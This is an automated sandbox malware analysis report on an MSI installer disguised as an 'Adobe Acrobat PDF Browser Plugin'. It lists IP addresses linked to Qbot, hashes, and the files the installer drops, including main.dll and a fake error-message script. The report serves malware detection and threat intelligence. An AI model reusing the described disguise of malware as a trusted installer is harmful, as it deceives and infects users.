81.111.108.123	unknown	United Kingdom	5089	NTLGB	true
69.133.162.35	unknown	United States	11426	TWC-11426-CAROLINASUS	true
86.132.236.117	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
151.62.238.176	unknown	Italy	1267	ASN-WINDTREIUNETEU	true
70.112.206.5	unknown	United States	11427	TWC-11427-TEXASUS	true
41.228.224.161	unknown	Tunisia	37693	TUNISIANATN	true
205.237.67.69	unknown	Canada	11290	CC-3272CA	true
102.159.188.125	unknown	Tunisia	37705	TOPNETTN	true
151.65.167.77	unknown	Italy	1267	ASN-WINDTREIUNETEU	true
76.178.148.107	unknown	United States	10838	OCEANIC-INTERNET-RRUS	true
89.36.206.69	unknown	Italy	48544	TECNOADSL-ASIT	true
69.242.31.249	unknown	United States	7922	COMCAST-7922US	true
85.104.105.67	unknown	Turkey	9121	TTNETTR	true
94.207.104.225	unknown	United Arab Emirates	15802	DU-AS1AE	true
193.253.100.236	unknown	France	3215	FranceTelecom-OrangeFR	true
76.16.49.134	unknown	United States	7922	COMCAST-7922US	true
201.244.108.183	unknown	Colombia	19429	ETB-ColombiaCO	true
103.42.86.42	unknown	India	133660	EDIGITAL-ASE-InfrastructureandEntertainmentIndiaPvtLt	true
78.18.105.11	unknown	Ireland	2110	AS-BTIREBTIrelandwaspreviouslyknownasEsatNetEUnet	true
80.6.50.34	unknown	United Kingdom	5089	NTLGB	true
103.144.201.56	unknown	unknown	139762	MSSOLUTION-AS-APSolutionBD	true
27.0.48.233	unknown	India	132573	SAINGN-AS-INSAINGNNetworkServicesIN	true
70.28.50.223	unknown	Canada	577	BACOMCA	true
98.145.23.67	unknown	United States	20001	TWC-20001-PACWESTUS	true
82.125.44.236	unknown	France	3215	FranceTelecom-OrangeFR	true
81.229.117.95	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
89.129.109.27	unknown	Spain	12479	UNI2-ASES	true
122.186.210.254	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	true
79.77.142.22	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	true
90.78.147.141	unknown	France	3215	FranceTelecom-OrangeFR	true
122.184.143.86	unknown	India	9498	BBIL-APBHARTIAirtelLtdIN	true
186.75.95.6	unknown	Panama	11556	CableWirelessPanamaPA	true
50.68.186.195	unknown	Canada	6327	SHAWCA	true
12.172.173.82	unknown	United States	2386	INS-ASUS	true
213.64.33.61	unknown	Sweden	3301	TELIANET-SWEDENTeliaCompanySE	true
79.168.224.165	unknown	Portugal	2860	NOS_COMUNICACOESPT	true
176.142.207.63	unknown	France	5410	BOUYGTEL-ISPFR	true
86.173.2.12	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	true
92.154.17.149	unknown	France	3215	FranceTelecom-OrangeFR	true
78.160.146.127	unknown	Turkey	9121	TTNETTR	true
58.186.75.42	unknown	Viet Nam	18403	FPT-AS-APTheCorporationforFinancingPromotingTechnolo	true
223.166.13.95	unknown	China	17621	CNCGROUP-SHChinaUnicomShanghainetworkCN	true
65.95.141.84	unknown	Canada	577	BACOMCA	true
50.68.204.71	unknown	Canada	6327	SHAWCA	true
71.38.155.217	unknown	United States	209	CENTURYLINK-US-LEGACY-QWESTUS	true
220.240.164.182	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	true
103.123.223.133	unknown	India	138329	KWS-AS-APKenstarWebSolutionsPrivateLimitedIN	true
24.198.114.130	unknown	United States	11351	TWC-11351-NORTHEASTUS	true
2.36.64.159	unknown	Italy	30722	VODAFONE-IT-ASNIT	true
198.2.51.242	unknown	United States	20001	TWC-20001-PACWESTUS	true
92.9.45.20	unknown	United Kingdom	13285	OPALTELECOM-ASTalkTalkCommunicationsLimitedGB	true
113.11.92.30	unknown	Bangladesh	7565	BDCOM-BDRangsNiluSquare5thFloorHouse75Road5AD	true
109.50.149.241	unknown	Portugal	2860	NOS_COMUNICACOESPT	true
69.119.123.159	unknown	United States	6128	CABLE-NET-1US	true
172.115.17.50	unknown	United States	20001	TWC-20001-PACWESTUS	true
147.219.4.194	unknown	United States	1498	DNIC-ASBLK-01498-01499US	true

General Information

Joe Sandbox Version:	37.1.0 Beryl
Analysis ID:	878465
Start date and time:	2023-05-30 18:05:23 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	r3zg12.msi
Detection:	MAL
Classification:	mal80.troj.evad.winMSI@10/21@0/100
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 15.6% (good quality ratio 7.1%) Quality average: 20.6% Quality standard deviation: 28.4%
HCA Information:	Successful, ratio: 67% Number of executed functions: 3 Number of non-executed functions: 171
Cookbook Comments:	Found application associated with file extension: .msi Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:06:29	API Interceptor	9x Sleep call for process: wermgr.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
2.82.8.80	main.dll	Get hash	malicious	Qbot	Browse
	graphically.dat.dll	Get hash	malicious	Qbot	Browse
	kxyj5.dat.dll	Get hash	malicious	Qbot	Browse
	PXNuYAPR.dat.dll	Get hash	malicious	Qbot	Browse
	TB9mkKe4Qzu.dat.dll	Get hash	malicious	Qbot	Browse
	leiotrichy.js	Get hash	malicious	Qbot	Browse
	a0UFMZnC6ltxphw.dat.dll	Get hash	malicious	Qbot	Browse
	msfilter.dll	Get hash	malicious	Qbot	Browse
	QPAWJ8VnpO.dll	Get hash	malicious	Qbot	Browse
	Cjpxxx.js	Get hash	malicious	Qbot	Browse
	analysis.dll	Get hash	malicious	Qbot	Browse
	ss3.dll	Get hash	malicious	Qbot	Browse
	Ffzknz.js	Get hash	malicious	Qbot	Browse
	Onhytfnr.js	Get hash	malicious	Qbot	Browse
	Hlyl.js	Get hash	malicious	Qbot	Browse
	Emrd.js	Get hash	malicious	Qbot	Browse
	XyU8ZgqTP.dll	Get hash	malicious	CryptOne, Qbot	Browse
	beautydomPorrigo.Reargument.dll	Get hash	malicious	CryptOne, Qbot	Browse
	Qwvupnjn.js	Get hash	malicious	Qbot	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MEO-RESIDENCIALPT	main.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	graphically.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	LEo7jDCX96.elf	Get hash	malicious	Mirai	Browse	2.81.219.243
	yvweY4vsVq.elf	Get hash	malicious	Mirai	Browse	188.81.116.228
	8C3RpG9eka.elf	Get hash	malicious	Mirai	Browse	85.244.28.246
	Pc8ewtsPRR.elf	Get hash	malicious	Mirai	Browse	85.240.179.8
	33cWz2DNq2.elf	Get hash	malicious	Mirai	Browse	2.83.183.198
	pu3jOk0Q9u.elf	Get hash	malicious	Mirai	Browse	82.155.117.104
	6mu5y2WWPK.elf	Get hash	malicious	Mirai	Browse	85.246.119.61
	A6BM2Ru5xc.elf	Get hash	malicious	Mirai	Browse	37.189.107.20
	43acf3.msi	Get hash	malicious	Qbot	Browse	188.83.251.100
	43acf3.msi	Get hash	malicious	Qbot	Browse	188.83.251.100
	666.dat.dll	Get hash	malicious	Qbot	Browse	188.83.251.100
	UnhookAverment.js	Get hash	malicious	Unknown	Browse	188.251.219.243
	kxyj5.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	PXNuYAPR.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	TB9mkKe4Qzu.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80
	leiotrichy.js	Get hash	malicious	Qbot	Browse	2.82.8.80
	a0UFMZnC6ltxphw.dat.dll	Get hash	malicious	Qbot	Browse	2.82.8.80

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Config.Msi\5334e8.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	8918
Entropy (8bit):	5.546027034811531
Encrypted:	false
SSDEEP:	96:reeKeWZJS2URPw9CsvRqWURPw9C6jR8iU/vRqmHVPYaTNnohcw+n+PTLwCUVpTBs:rmejZwg3ZwgjlbQ3UVpW
MD5:	C812AA360AFC13D5A8C4449856D77BA8
SHA1:	CC95BB7FE63ECAA1B3B37AE30C6D2338AEB1DAB9
SHA-256:	4CFFB89764A8A7C0EDE2242FB8968A6A2F1EEEF03B881A3A788FAA0DFA1F824A
SHA-512:	AA60CBEC3A325A173D7E2406416320DDBFBE6E999829C37F36A541AF2FF8298AD8C668328BCFB3CDCA1BAE98334E762927A2ECB5CD8681BBFFBF55832BBE846A
Malicious:	false
Preview:	...@IXOS.@.....@..V.@.....@.....@.....@.....@.....@......&.{BADFC54D-C40E-45B2-8055-C154444F1F83}'.Adobe Acrobat PDF Browser Plugin 4.8.25..r3zg12.msi.@.....@.....@.....@........&.{880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}.....@.....@.....@.....@.......@.....@.....@.......@....'.Adobe Acrobat PDF Browser Plugin 4.8.25......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}&.{BADFC54D-C40E-45B2-8055-C154444F1F83}.@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]..:.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\....B.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll....D.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs....WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....%.Software\AdobeAcrobatPDFBrowserPlugin...@....(.&...AdobeAcrobatPDFBro

C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	952832
Entropy (8bit):	6.765768694509863
Encrypted:	false
SSDEEP:	24576:UkgLxg2eMP8EN8Vo7zgDQ9uo4iZSBi/u3wXqx9jKVM5qx0YJ:x/jDQMo49wpq
MD5:	5E107608DD00957472DB2C1FCC77599D
SHA1:	D9BFA3E88CA0F86182CB84D4008AC6B346B755E9
SHA-256:	185737016A01E84BF88523A4681723B4F2D0D22520E77B76740CC3C6323E38BF
SHA-512:	22DFAE946F939EB361CEF49ED6EB953097A23A31BE0E97E6B7D31D3B2152C2371DA44E9E6BDD369E7145856BA75369FEA4DEAB18FA035E2A2CBD1E7D4E23CAF4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 3%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...m..d...........#...8...................................................... ...........@... .........................hC......<............................ ...?..........................$J.......................................................text...4...........................`.0`.data...............................@.0..rdata..\|...........................@.0@.bss....D....p.......>................0..edata..hC.......D...>..............@.0@.idata..<...........................@.0..CRT....0...........................@.0..tls................................@.0..rsrc...b...........................@.0..reloc...?.......@...J..............@.0B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\notify.vbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	132
Entropy (8bit):	4.599233980549996
Encrypted:	false
SSDEEP:	3:LwBxFkvH4dGmMKLVKRLGPz4VAFkvH4dGmMKLVKRLGH:cHFkvYdlZKRLi7FkvYdlZKRL4
MD5:	0D4C9F15CE74465C59AE36A27F98C817
SHA1:	9CCE8EEFA4D3D9C5E161C5DBB860CFE1489C6B1A
SHA-256:	D24E3399060B51F3A1C9D41A67DE2601888A35C99DA8DB70070D757BB3F1913A
SHA-512:	9BED0EAFC2CF2A2360850CA1070FFB04AC14F04C78379485998A93F45012B5C11CC7F6F68129F65B8B5F90437CB965908C6A1BB9D83A56B068D6BDE1D5FDAD1F
Malicious:	false
Preview:	MsgBox "Adobe Acrobat PDF Browser Plugin installation error 0x00000328", 16, "Adobe Acrobat PDF Browser Plugin installation error"..

C:\Windows\Installer\5334e7.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}, Create Time/Date: Tue May 30 14:29:16 2023, Last Saved Time/Date: Tue May 30 14:29:16 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Category:	dropped
Size (bytes):	507904
Entropy (8bit):	7.919635795804226
Encrypted:	false
SSDEEP:	12288:vn+NgINNEcfjVRMigNFoILI8KviLjvhAN+S0w3:vnX9gjVRMDqH8fL1+35
MD5:	665AFC8F8B7972F427FE1BD90D263032
SHA1:	CC36E48F383750EB9416961B52EE3100B6E30688
SHA-256:	D764436CAF7114D880F982D208BD9514A433772DCAC851F27C510D1597E26EDD
SHA-512:	D30110DC240790A1F0C15DF31069D361F80DF327C258DD3305E70EB9EE3814C285AB6290E88E4072B375F7DAC3D183D22ABA29CB94FDD7DB937C4399C18AD37E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\5334e9.msi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Adobe Acrobat PDF Browser Plugin 4.8.25, Author: Adobe Inc., Keywords: Installer, Comments: Adobe Acrobat PDF Browser Plugin, Template: Intel;1033, Revision Number: {880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}, Create Time/Date: Tue May 30 14:29:16 2023, Last Saved Time/Date: Tue May 30 14:29:16 2023, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.11.2.4516), Security: 2
Category:	dropped
Size (bytes):	507904
Entropy (8bit):	7.919635795804226
Encrypted:	false
SSDEEP:	12288:vn+NgINNEcfjVRMigNFoILI8KviLjvhAN+S0w3:vnX9gjVRMDqH8fL1+35
MD5:	665AFC8F8B7972F427FE1BD90D263032
SHA1:	CC36E48F383750EB9416961B52EE3100B6E30688
SHA-256:	D764436CAF7114D880F982D208BD9514A433772DCAC851F27C510D1597E26EDD
SHA-512:	D30110DC240790A1F0C15DF31069D361F80DF327C258DD3305E70EB9EE3814C285AB6290E88E4072B375F7DAC3D183D22ABA29CB94FDD7DB937C4399C18AD37E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\MSI36EA.tmp

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	2138
Entropy (8bit):	5.5791150458185745
Encrypted:	false
SSDEEP:	48:ZsT5zj3JwCP3RDufgFYjRBoD8SY1eU/rn7fnVaEVlt+Xt6q:G/hYjrAueIBaEP6
MD5:	1F6513D8FA2AB1C6046B39CC245944A4
SHA1:	B10AB5ACCE2B699F17C849407F8C3E7B3B1B8AFB
SHA-256:	DB342F3508603862C738AA37C27F04FA57E10FFD7C165662DC2FE04DEF7BE192
SHA-512:	71ECE8BDE50D6C91A79E43E3A3EDEC9B8B8B0B715ED7B5B0E20B82BC9845B28BC1B8981714876FCDA7BCEFEDE2A68C310C78528D5A58EBF54106589FE909A8CB
Malicious:	false
Preview:	...@IXOS.@.....@..V.@.....@.....@.....@.....@.....@......&.{BADFC54D-C40E-45B2-8055-C154444F1F83}'.Adobe Acrobat PDF Browser Plugin 4.8.25..r3zg12.msi.@.....@.....@.....@........&.{880CDD59-0C2C-49AC-BA45-82BB01CD8BD1}.....@.....@.....@.....@.......@.....@.....@.......@....'.Adobe Acrobat PDF Browser Plugin 4.8.25......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{82B5B2FD-2237-42AB-9F03-B3B9EAB30000}F.01:\Software\AdobeAcrobatPDFBrowserPlugin\AdobeAcrobatPDFBrowserPlugin.@.......@.....@.....@........InstallFiles..Copying new files&.File: [1], Directory: [9], Size: [6]...@.....@.....@......:.C:\Users\user\AppData\Local\AdobeAcrobatPDFBrowserPlugin\..).1\xssanpen\\|AdobeAcrobatPDFBrowserPlugin\......Please insert the disk: ..media3.cab.@.....@......C:\Windows\Installer\5334e7.msi.........@........main.dll..dll_main..main.dll.@.....@.....@.......@...

C:\Windows\Installer\SourceHash{BADFC54D-C40E-45B2-8055-C154444F1F83}

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.1624552326555946
Encrypted:	false
SSDEEP:	12:JSbX72FjQAGiLIlHVRpth/7777777777777777777777777vDHFZRwpSl0i8Q:JCQI5p0F
MD5:	37AB2087D8192F73564465B95F0BDA79
SHA1:	1406A27DC80D84250F76BF21BD56687AC594249F
SHA-256:	9D7BD6336C836A1991242C4A183A064021894E9A9F38F8CC6081274863C54DA7
SHA-512:	BBE40C0FAAB13636E98612B8805A8516026C839567AC998224CC8F8998E7A375E488E8DD33908401CEF9FC62CBB9A6D8F8F7100001E7205F90B449EFB8740948
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Installer\inprogressinstallinfo.ipi

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5060877643473185
Encrypted:	false
SSDEEP:	48:58PhfuRc06WXJ8FT5K0gMPduLMS5kArD6uLMSI818lP7AWMN:0hf1fFT3TPRtfA
MD5:	430F2ADF3561DDB478079AF68E971D68
SHA1:	7431BA57FB0275B6276BBA7370A317D67552D8B6
SHA-256:	8A709B97AFBFAA9E5CD5D3C566F95D370FE69AC31260A6F3C2FF82619F3D1026
SHA-512:	5A3904A81D986EE27F31D27383BB70BE01C709BFF580B7CD2AF184F8C8539439A3F38821B5C0D32B42F57DF0B92BC771B5ED7264082F842D19F346D3667C669A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	192827
Entropy (8bit):	5.392009325809667
Encrypted:	false
SSDEEP:	3072:iHHJCoX5CNWFHjkzRl1pqf5JjzH6wbxygaK8Nkv6kF8Kwu8K8uBD556GIlZZ6bFd:i0LVlAb
MD5:	3B520410F621CAAC0C856D080A24DC73
SHA1:	62B660B648C06F16DFDEE47AC468EF44F9E81D14
SHA-256:	D71D62F7FA3DAF2E96B31CF428170D103C5D17C9326C1BCA9805C6FA561F2F40
SHA-512:	412F894D897944A54401373C827D06E0C7A48F63B809E3441EE8B8ABDBFA19F5A6B0C8C0A3E8FDDF9DD32BB6051623C5C404DEB241C993BE50CE8DDBBABAB50C
Malicious:	false
Preview:	.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

C:\Windows\Temp\~DF09B6AE6DA39A576A.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF29580D728BC5B4ED.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	0.12071429906577896
Encrypted:	false
SSDEEP:	24:jIAWMQQt70R818lOdWmOLqrb9ipVIdWmOLqrb9ipV7VO3wGolrkgra+vMsvKL:cAWMN+R818lEuLMSouLMS5kArragMs
MD5:	5A66F5FD08B8CA2249380DDDF49D9D33
SHA1:	B4BD32E998A3A44BCC463E516596546E00296F96
SHA-256:	7825ED9BF119F45394DD851AAE50644AF5B0A10637237F55A7611CCCBDCCB99A
SHA-512:	4B13BD300E31411552873C292F037754D0D40AB5B9AA9941463F9A82099C4CABE7EE3B019753FB57046925FD63006A78B3941B0CF4FEC5EC663AA33F4DB13166
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF385081A1CE239BA3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.209919737144819
Encrypted:	false
SSDEEP:	48:rsHugPveFXJxT5+0gMPduLMS5kArD6uLMSI818lP7AWMN:IHAJTrTPRtfA
MD5:	5F8C47B7D4AFB1220F17DA429EAACB81
SHA1:	14180142867FDD137664D86CE077E44BB66C5DF9
SHA-256:	99A8B2F8F6B46ABADD467B39C55BECCE99C50AD04E3CCD0C5238548AA14257F7
SHA-512:	C7E3E848B867F1309B56B7F273434C906AF6ACF854A486B52A3B66C233976592DA52692535AD3E6C3B4D16A0AE46F7C7FB2A18707F056B95840781F73719CDDD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF3DD2B7692E631D41.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.209919737144819
Encrypted:	false
SSDEEP:	48:rsHugPveFXJxT5+0gMPduLMS5kArD6uLMSI818lP7AWMN:IHAJTrTPRtfA
MD5:	5F8C47B7D4AFB1220F17DA429EAACB81
SHA1:	14180142867FDD137664D86CE077E44BB66C5DF9
SHA-256:	99A8B2F8F6B46ABADD467B39C55BECCE99C50AD04E3CCD0C5238548AA14257F7
SHA-512:	C7E3E848B867F1309B56B7F273434C906AF6ACF854A486B52A3B66C233976592DA52692535AD3E6C3B4D16A0AE46F7C7FB2A18707F056B95840781F73719CDDD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF4C3BF86A9825BAFE.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.209919737144819
Encrypted:	false
SSDEEP:	48:rsHugPveFXJxT5+0gMPduLMS5kArD6uLMSI818lP7AWMN:IHAJTrTPRtfA
MD5:	5F8C47B7D4AFB1220F17DA429EAACB81
SHA1:	14180142867FDD137664D86CE077E44BB66C5DF9
SHA-256:	99A8B2F8F6B46ABADD467B39C55BECCE99C50AD04E3CCD0C5238548AA14257F7
SHA-512:	C7E3E848B867F1309B56B7F273434C906AF6ACF854A486B52A3B66C233976592DA52692535AD3E6C3B4D16A0AE46F7C7FB2A18707F056B95840781F73719CDDD
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF5DF60473004ABCC7.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF6B3BC2C5354ED014.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF7864E6E6496DBA61.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.5060877643473185
Encrypted:	false
SSDEEP:	48:58PhfuRc06WXJ8FT5K0gMPduLMS5kArD6uLMSI818lP7AWMN:0hf1fFT3TPRtfA
MD5:	430F2ADF3561DDB478079AF68E971D68
SHA1:	7431BA57FB0275B6276BBA7370A317D67552D8B6
SHA-256:	8A709B97AFBFAA9E5CD5D3C566F95D370FE69AC31260A6F3C2FF82619F3D1026
SHA-512:	5A3904A81D986EE27F31D27383BB70BE01C709BFF580B7CD2AF184F8C8539439A3F38821B5C0D32B42F57DF0B92BC771B5ED7264082F842D19F346D3667C669A
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8AE2E68986D61390.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF934EA1F7B18385F5.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
